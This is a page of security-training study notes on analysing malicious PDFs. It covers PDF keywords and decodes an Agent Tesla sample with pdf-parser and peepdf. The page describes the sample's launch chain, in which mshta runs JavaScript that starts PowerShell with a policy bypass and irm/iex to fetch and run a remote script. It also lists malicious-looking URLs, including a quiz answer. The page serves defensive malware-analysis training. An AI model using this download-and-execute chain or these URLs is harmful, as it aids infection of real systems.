FaresMorcy
  • Whoami
  • Footprinting Labs
    • Lab - Easy
    • Lab - Medium
    • Lab - Hard
  • Shells & Payloads
    • The Live Engagement
  • Password Attacks
    • Lab - Easy
    • Lab - Medium
    • Lab - Hard
  • Active Directory Enumeration & Attacks
    • Active Directory Enumeration & Attacks
    • AD Enumeration & Attacks - Skills Assessment Part I
    • AD Enumeration & Attacks - Skills Assessment Part II
  • SOC Hackthebox Notes & Labs
    • Security Monitoring & SIEM Fundamentals Module
    • Windows Event Logs & Finding Evil Module
    • Introduction to Threat Hunting & Hunting With Elastic Module
    • Understanding Log Sources & Investigating with Splunk Module
      • Introduction To Splunk & SPL
      • Using Splunk Applications
      • Intrusion Detection With Splunk (Real-world Scenario)
      • Detecting Attacker Behavior With Splunk Based On TTPs
      • Detecting Attacker Behavior With Splunk Based On Analytics
      • Skills Assessment
    • Windows Attacks & Defense
      • Kerberoasting
      • AS-REProasting
      • GPP Passwords
      • GPO Permissions/GPO Files
      • Credentials in Shares
      • Credentials in Object Properties
      • DCSync
      • Golden Ticket
      • Kerberos Constrained Delegation
      • Print Spooler & NTLM Relaying
      • Coercing Attacks & Unconstrained Delegation
      • Object ACLs
      • PKI - ESC1
      • Skills Assessment
    • Intro to Network Traffic Analysis Module
    • YARA & Sigma for SOC Analysts Module
      • Developing YARA Rules
      • Hunting Evil with YARA (Windows Edition)
      • Hunting Evil with YARA (Linux Edition)
      • Sigma and Sigma Rules
      • Developing Sigma Rules
      • Hunting Evil with Sigma (Chainsaw Edition)
      • Hunting Evil with Sigma (Splunk Edition)
      • Skills Assessment
  • Malicious Document Analysis - HTB
    • Introduction
    • PDF Analysis
    • Office Files Analysis
    • Excel Macro Analysis
    • RTF Documents Analysis
  • Build Home Lab - SOC Automation
    • Install & configure Sysmon for deep Windows event logging
    • Set up Wazuh & TheHive for threat detection & case management
    • Execute Mimikatz & create detection rules in Wazuh
    • Automate everything with Shuffle
    • Response to SSH Attack Using Shuffle, Wazuh, and TheHive
  • Home Lab (Attack & Defense Scenarios)
    • Pass-the-Hash Attack & Defense
    • Scheduled Task Attack & Defense
    • Kerberoasting Attack & Defense
    • Kerberos Constrained Delegation
    • Password Spraying Attack & Defense
    • Golden Ticket Attack & Defense
    • AS-REProasting Attack & Defense
    • DCSync Attack & Defense
  • Home Lab (FIN7 (Carbanak Group) – Point of Sale (POS) Attack on Hospitality Chains)
  • Home Lab (Lumma Stealer)
  • Build ELK Lab
    • Configure Elasticsearch and Kibana setup in ubuntu
    • Configure Fluent-Bit to send logs to ELK
    • Set up Winlogbeat & Filebeat for log collection
    • Send Logs from Winlogbeat through Logstash to ELK
    • Enable Windows Audit Policy & Winlogbeat
    • Elasticsearch API and Ingestion Pipeline
  • CyberDefenders
    • XXE Infiltration Lab
    • T1594 Lab
    • RetailBreach Lab
    • DanaBot Lab
    • OpenWire Lab
    • BlueSky Ransomware Lab
    • Openfire Lab
    • Boss Of The SOC v1 Lab
    • GoldenSpray Lab
    • REvil Lab
    • ShadowRoast Lab
    • SolarDisruption Lab
    • Kerberoasted Lab
    • T1197 Lab
    • Amadey Lab
    • Malware Traffic Analysis 1 Lab
    • Insider Lab
    • Volatility Traces Lab
    • FalconEye Lab
    • GitTheGate Lab
    • Trident Lab
    • NerisBot Lab
  • TryHackme Rooms
    • Investigating Windows
    • Splunk 2
    • Windows Network Analysis
  • Powershell Scripting Fundamentals
  • SANS SEC504 & Labs
    • Book one
      • Live Examination
      • Network Investigations
      • Memory Investigations
      • Malware Investigations
      • Accelerating IR with Generative AI
      • Bootcamp: Linux Olympics
      • Bootcamp: Powershell Olympics
    • Book Two
      • Hacker Tools and Techniques Introduction
      • Target Discovery and Enumeration
      • Discovery and Scanning with Nmap
      • Cloud Spotlight: Cloud Scanning
      • SMB Security
      • Defense Spotlight: Hayabusa and Sigma Rules
    • Book Three
      • Password Attacks
      • Cloud Spotlight: Microsoft 365 Password Attacks
      • Understanding Password Hashes
      • Password Cracking
      • Cloud Spotlight: Insecure Storage
      • Multipurpose Netcat
    • Book Four
      • Metasploit Framework
      • Drive-By Attacks
      • Command Injection
      • Cross-Site Scripting
      • SQL Injection
      • Cloud Spotlight: SSRF and IMDS
    • Book Five
      • Endpoint Security Bypass
      • Pivoting and Lateral Movement
      • Hijacking Attacks
      • Establishing Persistence
      • Defense Spotlight: RITA
      • Cloud Spotlight: Cloud Post-Exploitation
  • SANS SEC511 & Labs
    • Resources
      • Primers
      • References
      • Tools
        • Network
        • Elastic Stack
      • Printable Versions
    • Book One
      • Part One
      • Part Two
      • Part Three
    • Book Two
      • Part One
      • Part Two
      • Part Three
      • Part Four
    • Book Three
      • Part One
      • Part Two
      • Part Three
      • Part Four
    • Book Four
      • Part One
      • Part Two
      • Part Three Lab
      • Part Four Lab
    • Book Five
      • Part One Lab
      • Part Two Lab
      • Part Three Lab
  • Practical Windows Forensics
    • Data Collection
    • Examination
    • Disk Analysis Introduction
    • User Behavior
    • Overview of disk structures, partitions and file systems
    • Finding Evidence of Deleted Files with USN Journal Analysis
    • Analyzing Evidence of Program Execution
    • Finding Evidence of Persistence Mechanisms
    • Uncover Malicious Activity with Windows Event Log Analysis
    • Windows Memory Forensic Analysis
  • Hackthebox Rooms
    • Campfire-1
    • Compromised
    • Brutus
    • Trent
    • CrownJewel-1
  • WEInnovate Training
    • Weinnovate - Active Directory Task One
    • Build ELK Lab
      • Configure Elasticsearch and Kibana setup in ubuntu
      • Configure Fluent-Bit to send logs to ELK
      • Set up Winlogbeat & Filebeat for log collection
      • Send Logs from Winlogbeat through Logstash to ELK
      • Enable Windows Audit Policy & Winlogbeat
      • Elasticsearch API and Ingestion Pipeline
    • SOAR
      • Send Alerts To Email & Telegram Bot
      • Integrate Tines with ELK
    • SOC Practical Assessment
    • Lumma C2
    • Network Analysis
  • TryHackme SOC 1
    • TShark
      • TShark: The Basics
      • TShark: CLI Wireshark Features
      • TShark Challenge I: Teamwork
      • TShark Challenge II: Directory
    • Tempest
    • Boogeyman 1
    • Boogeyman 2
    • Boogeyman 3
  • TryHackme SOC 2
    • Advanced Splunk
      • Splunk: Exploring SPL
      • Splunk: Setting up a SOC Lab
      • Splunk: Dashboards and Reports
      • Splunk: Data Manipulation
      • Fixit
    • Advanced ELK
      • Slingshot
    • Threat Hunting
      • Threat Hunting: Foothold
      • Threat Hunting: Pivoting
      • Threat Hunting: Endgame
Powered by GitBook
On this page
  • PDF Format
  • Malicious PDF Documents
  • Suspicious Keywords
  • PDF Document Analysis (AgentTesla)
  • Analysis using PeePDF
  • Extracting Image from the PDF
  • Questions
  1. Malicious Document Analysis - HTB

PDF Analysis

PreviousIntroductionNextOffice Files Analysis

Last updated 1 day ago

PDF Format

Understanding the internal structure of a PDF file is important for effective analysis. A typical PDF consists of several components, as mentioned below:

  • Header: The beginning of a PDF file, containing the version number (e.g., %PDF-1.7).

  • Body: Contains objects such as text, images, and embedded files. Objects are defined by numbers and include dictionaries, streams, and arrays.

  • Cross-Reference Table (xref): Maps object numbers to their byte offset in the file.

  • Trailer: Marks the end of the file and contains a reference to the xref table.

Malicious PDF Documents

Malicious documents can take many forms, each exploiting different aspects of document processing software. PDF documents are among the most common types used in phishing campaigns. These documents can embed JavaScript, which can be used to exploit vulnerabilities in PDF readers.

Suspicious Keywords

While going through the objects, always look for the use of suspicious keywords present in the objects. Keywords are actions and elements that control how a PDF works. PDF files use a variety of keywords to define the properties and behaviors of objects. These keywords specify various document settings, actions, and metadata.

  • /OpenAction (/AA): This specifies an action to be performed when the document is opened. Malicious actors use this to automatically execute malicious scripts without user interaction.

  • /Launch: This keyword specifies an action to launch an external application or open a file. This can be used maliciously to execute embedded malware or scripts.

  • /JavaScript (/JS): Specifies a JavaScript action, while /JS defines the actual script to be executed. Malicious JavaScript can perform a variety of harmful actions, such as downloading malware or stealing information.

  • /Names: This includes the names of files that will likely be referred to by the PDF itself. Malicious documents often contain embedded files that are intended to be dropped on the system. The names of these files can be found here. Inspect any entries under /Names carefully.

  • /EmbeddedFile: Used to embed files within the PDF. Malicious PDFs often use this to include executable files or other payloads.

  • /URI /SubmitForm: Defines an action to submit form data to a specified URL. This can be used to steal user information or send data to a malicious server.

PDF Document Analysis (AgentTesla)

We'll perform the analysis of a malicious PDF sample that runs Agent Tesla. Agent Tesla is a .NET based Remote Access Trojan (RAT) and data stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.

python C:\Tools\MalDoc\PDF\Tools\pdfid\pdfid.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf -e

The switch -e gives additional information, such as entropy, along with object types and associated object entries.

Reviewing the output from the top, we can observe that the PDF file contains five stream objects, along with an object stream (/ObjStm). As discussed in previous sections, object streams can encapsulate other objects, making them invisible to standard analysis tools. Therefore, it is essential to manually inspect and decode these streams to reveal any hidden objects and their associated data.

Also, the keyword /OpenAction is very suspicious. As the name implies, this PDF entry is used to dictate the behavior of the document when the user opens it. Malware often abuses this feature to gain code execution via cmd.exe or JavaScript.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf

We can investigate the contents of keyword /OpenAction by using --search or -s parameter in pdf-parser, as shown below.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf --search=openaction

As we can see, the /OpenAction entry is inside the object 2. However, the contents of /OpenAction reside in object "4" because of the "4 0 R" indirect object. We can examine object 4 by using command -o.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf --object=4

Interestingly, there is no result for object 4.

The PDFid output that we checked earlier showed /ObjStm present in the PDF file. So lets search for it using pdf-parser, as shown below, by providing the -s or --search parameter.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf --search=ObjStm

As we can see, the object 1 is an object stream /ObjStm. The /N entry denotes the number of objects present in the stream; in our case, there are 39 objects present in the stream. The /Filter entry shows the algorithm used to decode the data, which in our case is FlateDecode.

Now let's decode object 1 to see the objects present in the stream.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf -f -o 1

Before we proceed, recall that object streams contain dictionaries. The start and end of a dictionary are identified by the symbols << and >>, respectively. There are 39 dictionaries present in the object stream. Each dictionary represents an object. Each such object has associated entries or PDF keywords.

The challenge here is to identify an object. The object labels can be retrieved by studying the initial numbers mentioned in the decoded object stream:

3 0 4 68 5 93 6 144 7 182 8 205 9 1116 10 1231 11 1248 12 1282 13 1299 14 1376 15 1440 16 1653 17 1725 18 1754 19 1769 20 1833 21 1885 22 2046 23 2060 24 2099 25 2113 26 2274 27 2283 28 2360 29 2414 30 2474 31 2635 32 2796 33 2957 34 3118 36 3279 38 3316 39 3359 40 3396 41 3412 42 3428 44 3453

Here's how it works:

  1. First Number: The first number (/First) tells you where the first object starts in the stream.

  2. Pairs of Numbers: After that, the numbers come in pairs:

    • First number in the pair: This is the label (name or ID) of the object.

    • Second number in the pair: This is the offset (distance) from /First where the object's data is located.

  3. Order Matters: The position of the label in the sequence matches the order of the object in the stream.

Example:

The sequence starts with 3 0 4 68 5 93...

  • /First = 3 (the offset of the first object).

  • Label 0 is at offset 3 + 0 = 3 (first object).

  • Label 4 is at offset 3 + 68 = 71 (second object).

  • Label 5 is at offset 3 + 93 = 96 (third object). ...and so on.

To understand the logic behind how it works, let's spin up a Python shell and store this whole stream in a variable called stream.

This is the logic to parse the stream of /ObjStm objects. Once all the hidden objects are extracted from the stream object, we can continue our investigation related to the /OpenAction keyword.

The /OpenAction in object 2 pointed to an object 4. Now we can see the contents of object 4 here in the above table.

The key /S /Launch indicates that it's a launch action, which is used to run an external application. The /Win 8 0 R part references another object (object 8 0) that contains the details of the command to be executed. Let's check object 8.

The /P key holds a long string of hexadecimal characters, which is a payload. When decoded, this is a JavaScript payload designed to perform some malicious action. The /F key indicates the file to be executed, which is C:\\Windows\\System32\\mshta. This is a legitimate Windows executable used to execute HTML Applications (HTA). In this context, it is being used to execute the JavaScript payload contained in the /P key.

The JavaScript code executes a series of actions designed to run a PowerShell script. It first instantiates an ActiveXObject via WScript.Shell to execute a PowerShell command using the Run method. It also creates a Scripting.FileSystemObject and configures the system to use the TLS 1.2 security protocol, ensuring compatibility with modern HTTPS endpoints. The PowerShell command includes the -ep Bypass flag to override policy restrictions and allow unrestricted script execution. It uses Invoke-RestMethod (irm) to fetch a script from htlfeb24.blogspot.com/.../atom.xml and immediately executes it via Invoke-Expression (iex). A Start-Sleep -Seconds 5 command introduces a 5-second delay, likely to evade certain detection mechanisms. Finally, the script removes itself using Scripting.FileSystemObject, likely to eliminate forensic evidence.

The above logic was explained in detail so that we can understand how the whole process works. To make this process easier, this can be done automatically using the parameter --objstm of the PDF-Parser.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf --objstm

Analysis using PeePDF

Let's also use another tool called PeePDF, which is an interactive tool useful for analyzing PDF documents.

peepdf C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf -i

Let's see the details regarding the object related to the /Launch element.

We can see that it refers to another object, 8 0. We can open the details of object 8, which reveals the decoded JavaScript that runs the PowerShell command to download a file atom.xml (most probably a PowerShell script), and execute it.

Let's now check the /OpenAction element as well, i.e., object 2.

This also leads to the final URL where the malicious PowerShell script is hosted (not available at the time of analysis). The script is downloaded and executed using iex. Then it goes to sleep and later deletes the script file to hide artifacts.

Let's also see the other additional actions specified in /AA.

This just pops up an alert window. Let's check the /AA element 15.

All of these referencing objects refer to the same URI where the script is hosted.

Extracting Image from the PDF

We can dump the image file as a JPEG file using -d in PDF-Parser.

python C:\Tools\MalDoc\PDF\Tools\pdf-parser\pdf-parser.py -o 43 -d image.jpeg C:\Tools\MalDoc\PDF\Demo\Samples\AgentTesla\invoice-1580727057.pdf

In the above output from PDF-Parser, we can see that this XObject has the /Subtype Image. It also has a width and a height. This also has a different /Filter /DCTDecode, which represents it as a JPEG file.

The screenshot below shows this image is loaded by the PDF viewer and the link it tries to visit that we extracted earlier.

Questions

Q1) Locate the sample in the directory "C:\Tools\Maldoc\PDF\Demo\Samples\WikiLoader". Perform analysis of the objects within the sample. What is the value of /URI in object 7? Answer format is a URL.

peepdf "C:\Tools\Maldoc\PDF\Demo\Samples\WikiLoader\Invoice_2930_from_Sidley Austin LLP.pdf" -i

Answer: https://infplaute.com/international-commercial